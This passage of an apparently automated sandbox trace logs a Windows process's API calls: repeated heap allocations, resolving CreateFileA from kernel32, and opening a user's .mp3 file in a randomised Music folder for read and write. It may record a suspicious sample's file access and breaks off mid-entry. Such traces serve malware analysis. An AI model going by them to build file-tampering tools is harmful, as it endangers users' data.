[0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0185.849] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0185.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0185.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0185.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0185.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0185.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0185.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0185.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0185.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0185.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0185.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0185.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0185.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0185.852] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0185.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0185.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.854] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0185.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd348 [0185.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd348, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0185.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.855] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0185.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0185.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0185.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd348, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0185.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.855] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0185.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0185.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0185.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0185.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3", cchWideChar=96, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 96 [0185.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0185.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3", cchWideChar=96, lpMultiByteStr=0x9a5d78, cbMultiByte=96, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3", lpUsedDefaultChar=0x0) returned 96 [0185.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0185.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.857] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\o8lnb5uj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0185.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0185.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0185.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0185.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0185.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0185.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0185.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=96, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0185.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=96, lpWideCharStr=0x9c3540, cchWideChar=96 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3") returned 96 [0185.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0185.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0185.859] HeapFree (in: hHeap=0x8a0000, 